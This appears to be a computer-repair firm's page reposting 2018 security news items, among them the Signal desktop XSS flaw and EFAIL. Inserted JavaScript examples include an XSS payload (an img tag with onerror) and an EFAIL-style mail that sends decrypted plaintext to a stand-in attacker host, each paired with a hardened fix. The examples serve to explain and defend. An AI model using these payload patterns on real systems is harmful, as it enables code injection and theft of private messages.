May 16, 2018

Facebook can’t wiggle out of facial recognition lawsuit, judge says

By Lisa Vaas

Three years ago, Facebook was hit with a class action lawsuit over allegedly violating privacy rights by “secretly” sticking users’ faces into its huge database without their consent.

No, you can’t wiggle out of this one, a San Francisco federal judge said a year later, refusing to approve Facebook’s request to toss the suit.

On Monday, he said it again. In his order, US District Judge James Donato scolded Facebook, noting “a troubling theme” in the social media network’s “voluminous” submissions (there have been hundreds of pages) of briefs, documents, emails, deposition testimony and expert opinions.

Namely, they show Facebook reverting to “the faulty proposition” that plaintiffs must show an “actual” injury beyond the invasion of the privacy rights afforded by Illinois’s 2008 Biometric Information Privacy Act (BIPA), the statute under which the class action was filed.

That’s not what the court’s prior decisions said, Donato wrote.

The Court expressly rejected that contention in considerable detail in the class certification order and the order finding… standing to sue.

A class was certified for that exact reason. BIPA does not require additional proof of individualized “actual” harm, and so the question of whether Facebook is liable can be decided in “one stroke” for the class as a whole without a likelihood that individualized inquiries would overwhelm commonality and predominance.

Donato said that to contend otherwise is to “misread and misrepresent the Court’s orders.”

Therefore, Facebook’s got to face the facial-recognition music, he said. Donato also denied both parties’ motions for summary judgment, given how much they still disagree on, including whether collecting “facial geometry” amounts to facial recognition at all.

Read more at https://nakedsecurity.sophos.com/2018/05/16/facebook-cant-wiggle-out-of-facial-recognition-lawsuit-judge-says/

Serious XSS vulnerability discovered in Signal

By John E Dunn

Researchers have discovered a serious cross-site scripting (XSS) vulnerability affecting all desktop versions of Edward Snowden’s favorite security application, Signal.

An XSS flaw is a nuisance in any application but in Signal, used by parties that want the highest levels of privacy, this is amplified.

An attacker posing as a contact could use the flaw to send a message containing a malicious URL that sets up a range of code-injection attacks using image, audio or iframe tags, or that simply crashes the client.

Researcher Iván Ariel Barrera Oro, the flaw’s co-discoverer, described how he had chanced upon the issue completely by accident:

The critical thing here was that it didn’t require any interaction from the victim, other than simply being in the conversation.

Which meant:

Inside iframes, everything was possible, even loading code from an SMB share! This enables an attacker to execute remote code without caring about CSP [Content Security Policy].

That’s not a compromise of the software’s end-to-end encryption, but it would be helpful to an attacker trying to trick a would-be victim into giving up information about themselves.
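The bug class behind this, shown here as an added example written for this page and not Signal’s own code: a desktop messenger built on an HTML renderer takes sender-controlled message text, turns the URLs in it into clickable links, and splices the result into the page as raw markup. The linkifier, the hostile message and the tag-counting helper below are constructed for the demo; the hardened version escapes every byte of message text so the only markup in the output is the anchor the client generates itself.

```javascript
// Added example, not Signal's code: a message linkifier in a vulnerable and a
// hardened form. Desktop messengers that render with an HTML engine (Electron
// and similar) hit this bug class whenever message text is assembled into
// markup as a plain string.

// Only http(s) URLs, and never the characters that could close an attribute or tag.
const URL_RE = /https?:\/\/[^\s<>"']+/g;

// VULNERABLE: sender-controlled text is spliced straight into HTML, so any
// <img onerror=...>, <audio> or <iframe src="\\share\..."> tag in the message
// becomes live markup, with no interaction from the recipient.
function linkifyUnsafe(message) {
  return message.replace(URL_RE, (url) => `<a href="${url}">${url}</a>`);
}

function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return text.replace(/[&<>"']/g, (c) => map[c]);
}

// HARDENED: everything the sender wrote is escaped; the only markup in the
// output is the anchor we build ourselves, and its href is escaped as well.
function linkifySafe(message) {
  let html = '';
  let last = 0;
  for (const m of message.matchAll(URL_RE)) {
    html += escapeHtml(message.slice(last, m.index));
    const url = m[0];
    html += `<a href="${escapeHtml(url)}" rel="noopener noreferrer">${escapeHtml(url)}</a>`;
    last = m.index + url.length;
  }
  return html + escapeHtml(message.slice(last));
}

// Names of the opening tags present in a rendered string. Anything other than
// "a" in the hardened output would mean sender-supplied markup survived.
function tagNames(html) {
  return [...html.matchAll(/<([a-zA-Z][a-zA-Z0-9]*)/g)].map((m) => m[1].toLowerCase());
}

// Constructed hostile message for the demo: a tag with an event handler plus a URL.
const HOSTILE = 'hi <img src=x onerror="alert(1)"> see https://example.com/a';

// tagNames(linkifyUnsafe(HOSTILE)) -> ["img", "a"]   (injected tag is live)
// tagNames(linkifySafe(HOSTILE))   -> ["a"]          (only our own anchor)
```

Escaping is the fix for the injection itself; a Content Security Policy is a second layer, but as the researcher’s quote notes, an iframe pointed at an SMB share sidesteps CSP, so the policy should also forbid framing (`frame-src 'none'`) rather than rely on script restrictions alone.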

Designated CVE-2018-10994, the flaw affects all desktop versions (Windows, Mac, Linux) but not the mobile Android or iOS apps. The vulnerable versions are v1.7.1, v1.8.0, v1.9.0, and v1.10.0, fixed by upgrading to v1.10.1 or v1.11.0-beta.3.

Read more at https://nakedsecurity.sophos.com/2018/05/16/serious-xss-vulnerability-discovered-in-signal/

Facebook app left 3 million users’ data exposed for four years

By Lisa Vaas

Cambridge Analytica, burned to a crisp after being caught manhandling Facebook users’ data, blew away as ashes on 2 May.

Before it did, former employees had told Gizmodo that they knew the writing was on the wall for the data analytics company, but they didn’t realize how fast the flames would engulf it.

It felt unjust, they seemed to believe. They were just a “typical member of their industry caught in a media firestorm,” as Gizmodo put it. You can see why they’d feel unfairly singled out: in short order, it became clear that Cambridge Analytica wasn’t an aberration. A twin named Cubeyou turned up in April: yet another firm that dressed up its personal-data snarfing as “nonprofit academic research,” in the form of personality quizzes, and handed over the data to marketers.

And now, we have a triplet.

A New Scientist investigation has found that yet another popular Facebook personality app used as a research tool by academics and companies – this one is called myPersonality – fumbled the data of three million Facebook users, including their answers to intimate questionnaires.

Academics at the University of Cambridge distributed data from myPersonality to hundreds of researchers via a website with lousy security… and left it there for anybody to get at, for four years.

New Scientist described the data as being “highly sensitive, revealing personal details of Facebook users, such as the results of psychological tests.” It was meant to be stored and shared anonymously, but “such poor precautions were taken that deanonymizing would not be hard,” it reports.

People had to register as a project collaborator to get access to the full data set, and more than 280 people from nearly 150 institutions did so, including university researchers and those from companies including Facebook, Google, Microsoft and Yahoo.

No permanent academic contract? No big-name company paying you to do research? No problem. For four years, there’s been a username and password to get at the data. The credentials have been sitting on the code-sharing website GitHub. A simple web search would lead you to the working credentials.

Read more at https://nakedsecurity.sophos.com/2018/05/15/facebook-app-left-3-million-users-data-exposed-for-four-years/


Police dog sniffs out USB drive to snare school hacker

By Lisa Vaas

Thanks to a trained police dog sniffing out a thumb drive hidden inside a box of tissues, a high schooler in a San Francisco Bay area suburb has been accused of hacking grades: some students’ grades got bumped up, and some got elbowed down.

Local TV station KPIX reports that police in Concord – the eighth largest city in the area – say that the hack started with a phishing email.

The mail went out to teachers at Ygnacio Valley High School and linked to a website disguised to look like a Mount Diablo School District site. Concord Police Sergeant Carl Cruz told KPIX that the message prompted recipients to go to the bogus site and then…

…to log in to refresh your password or reset something.

…which one teacher did, thereby handing the hacker their login credentials.

Police aren’t releasing the name of the suspect, since he’s underage. They’re accusing him of using the teacher’s login to get into the electronic grading system and boost or lower 16 students’ grades. That includes his own grades, which he raised, police claim.

KPIX say that police traced an “electronic trail” – an IP address, one assumes – to the suspect’s house and searched it last Wednesday.

That’s where Doug the Dog and a USB drive tucked into a box of tissues come in. The K-9 is one of the few police dogs trained to sniff out electronic devices, and “that’s what he did,” Sergeant Cruz said.

We’ve previously written about another electronics-sniffing dog named Thoreau who helped to catch an alleged pedophile by sniffing out hidden hard drives.

Read more at https://nakedsecurity.sophos.com/2018/05/15/police-dog-sniffs-out-usb-drive-to-snare-school-hacker/

The next Android version’s killer feature? Security patches

By John E Dunn

Big news for Android users – the next version of Google’s mobile OS will require device makers to agree to implement regular security patches for the first time in the operating system’s history.

For now, the only evidence we have for this development is a brief and easy-to-miss comment made at last week’s I/O conference by Android’s director of security, David Kleidermacher.

Still, his words don’t leave much wiggle room:

We’ve also worked on building security patching into our OEM agreements. Now this will really lead to a massive increase in the number of devices and users receiving regular security patches.

About time, security watchers will say as they survey the mess of Android’s fragmentation, which, paradoxically, has grown more pronounced as the OS has matured.

That maturity has come at a price – a new version every year – which sounds great until you contemplate the consequences of large numbers of devices with security vulnerabilities that won’t or can’t be patched.

Android fragmentation happens on two axes at the same time, namely the annual updates to the OS (which add new features and architecture tweaks), and monthly security updates.

Consider that in the nine years between Android Cupcake in April 2009 and the forthcoming Android P, Google will have produced 14 versions of its mobile OS.

Read more at https://nakedsecurity.sophos.com/2018/05/15/the-next-android-versions-killer-feature-security-patches/

The EFAIL vulnerability – why it’s OK to keep on using email

By Paul Ducklin

This week’s bug of the month is the trendily-named EFAIL.

Like many groovy bugs these days, it’s both a BWAIN (bug with an impressive name) and a BWIVOL (bug with its very own logo).

The name is a pun of sorts on the word “email”, and the bug is caused by a flaw in the specifications set down for two popular standards used for email encryption, namely OpenPGP and S/MIME.

Simply put, the EFAIL vulnerabilities are a pair of security holes that a crook might be able to use to trick recipients of encrypted messages into leaking out some or all of their decrypted content.

Note that this attack only applies if you are using S/MIME or OpenPGP for end-to-end email encryption.

If you aren’t using either of these add-ons in your email client, this vulnerability doesn’t affect you – after all, if the crooks can sniff out your original messages and they’re not encrypted, they’ve got your plaintext already.

Note also that this attack doesn’t work on all messages; it doesn’t work in real time; you need a copy of the original encrypted message; it only works with some email clients; and it pretty much requires both HTML rendering and remote content download turned on in your email client.

Additionally, for one of the flavors of the attack, you have to know, or be able to guess correctly, some of the plaintext from the original message.

Technically speaking, these attacks aren’t strictly due to bugs, but rather to sloppy standards in S/MIME and OpenPGP that aren’t strict enough by design to inhibit this sort of “message tweaking”.
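Why HTML rendering plus remote content download is the dangerous combination, as an added example written for this page and not code from the article or from the EFAIL researchers. It models the shape of the variant that needs no knowledge of the plaintext: the attacker, holding a copy of the original encrypted message, wraps that ciphertext part between two HTML parts of their own. A client that decrypts and then renders the whole message as one HTML document ends up with the plaintext inside a URL it fetches. The mail, the names and the stand-in `decrypt()` are constructed for the demo.

```javascript
// Added example, not from the article or the EFAIL authors. Toy model of the
// direct-exfiltration shape: ciphertext sandwiched between attacker HTML parts.

const SECRET = 'meet at the usual place, 21:00'; // constructed plaintext

// Stand-in for OpenPGP/S-MIME decryption of a part the attacker captured earlier.
function decrypt(part) {
  return part.plaintext;
}

function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return text.replace(/[&<>"']/g, (c) => map[c]);
}

// Constructed attacker message: an HTML part that opens an img src attribute
// and never closes it, the victim's stolen encrypted part, then the closing quote.
const ATTACKER_MAIL = [
  { type: 'text/html', body: '<img src="http://attacker.example/collect?x=' },
  { type: 'application/pgp-encrypted', plaintext: SECRET },
  { type: 'text/html', body: '">' },
];

const isEncrypted = (p) => p.type === 'application/pgp-encrypted';

// VULNERABLE: every part is decrypted and all of them are glued into a single
// HTML document, so the attacker's unclosed attribute swallows the plaintext.
function renderMerged(parts) {
  return [parts.map((p) => (isEncrypted(p) ? decrypt(p) : p.body)).join('')];
}

// HARDENED: each MIME part is its own document and decrypted content is shown
// as text, never as markup, so no part can reach into its neighbour.
function renderIsolated(parts) {
  return parts.map((p) => (isEncrypted(p) ? `<pre>${escapeHtml(decrypt(p))}</pre>` : p.body));
}

// The URLs a renderer with remote-content loading enabled would fetch from the
// given documents. With remote content off (the other mitigation), nothing is fetched.
function remoteLoads(docs, { remoteContent = true } = {}) {
  if (!remoteContent) return [];
  const urls = [];
  for (const doc of docs) {
    for (const m of doc.matchAll(/src="(https?:[^"]*)"/g)) urls.push(m[1]);
  }
  return urls;
}

// True if any outbound fetch would carry the plaintext to the attacker's server.
function leaks(urls, secret) {
  return urls.some((u) => u.includes(secret));
}

// leaks(remoteLoads(renderMerged(ATTACKER_MAIL)), SECRET)   -> true
// leaks(remoteLoads(renderIsolated(ATTACKER_MAIL)), SECRET) -> false
```

This covers only the flavour that needs no plaintext knowledge; the other flavour mentioned above, which tweaks the ciphertext itself and so needs some known plaintext, is not modelled here. Either way, the two client-side mitigations are the ones the article lists: do not render the decrypted message as HTML, and do not fetch remote content automatically.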

In the short term, you can expect updates to affected email clients that do their best to suppress these holes; in the long term, you should hope for improved standards for end-to-end email encryption.

In the immediate term, the full article linked below lists steps you can take to protect yourself right now.

Read more at https://nakedsecurity.sophos.com/2018/05/15/the-efail-vulnerability-why-its-ok-to-keep-on-using-email/

Prison phone service can expose the location of anyone with a phone

By Lisa Vaas

In late April, somebody sent a letter containing meth to an inmate at an Arizona jail.

Tracking down the correspondent was no problem. Police looked at phone calls between the meth sender’s address and the inmate and then made an arrest, according to what Matthew Thomas, chief deputy of the Pinal County Sheriff’s Office, told the New York Times.

It was push-button easy thanks to the police having access to a location data lookup service from a company called Securus Technologies that provides and monitors calls to inmates. According to the Times, marketing documents show that the service, which is typically used by marketers and other businesses, gets the location data from major cellphone carriers, including AT&T, Sprint, T-Mobile and Verizon.

It’s far too easy to get that data, some say. Privacy experts, at least one legislator, and inmates’ families say the service, which is fed by data from a mobile marketing company called 3Cinteractive, enables users to look up the whereabouts of nearly any mobile phone in the country, within seconds, without verifying the warrants or affidavits that Securus requires users to upload.

The system is typically used by marketers who offer deals to people based on their location.

It brings back memories of a Google scheme, revealed last year, that aims to track users in real life. As Google announced at its annual Marketing Next conference in May 2017, it wants to go beyond just serving ads to consumers. Using an artificial intelligence (AI) tool called Attribution, it said it would follow us around to see where we go, tracking us across devices and channels – mobile, desktop and in physical stores – to see what we’re buying, to match purchases up with what ads we’ve seen, and to then automatically tell marketers what we’re up to and what ads have paid off.

The Electronic Privacy Information Center (EPIC) was none too happy about the idea. In short order, EPIC filed a complaint with the Federal Trade Commission (FTC) to stop Google from tracking in-store purchases.

Read more at https://nakedsecurity.sophos.com/2018/05/15/prison-phone-service-can-expose-the-location-of-anyone-with-a-phone/

ACS

Advanced Computer Services of Central Florida

Centrally located in Winter Haven, we serve residential and business clients in and around Polk County.

9 Camellia Drive
Winter Haven, FL 33880
863-229-4244

Our Promise to You

Plain language, no tech-talk

We will never try to over-sell you a product you don't need.


Advanced Computer Services of Central Florida is your local, hometown computer service and repair company that can do more than just fix your PC.  We offer highly skilled professionals who can be counted on to give you sound advice on upgrades, software and hardware, commercial & residential networks, hardwire or secure wireless.

No trip charges within Polk County

No after-hours or weekend fees

$45.00/hr Residential

$65.00/hr Commercial - free system evaluation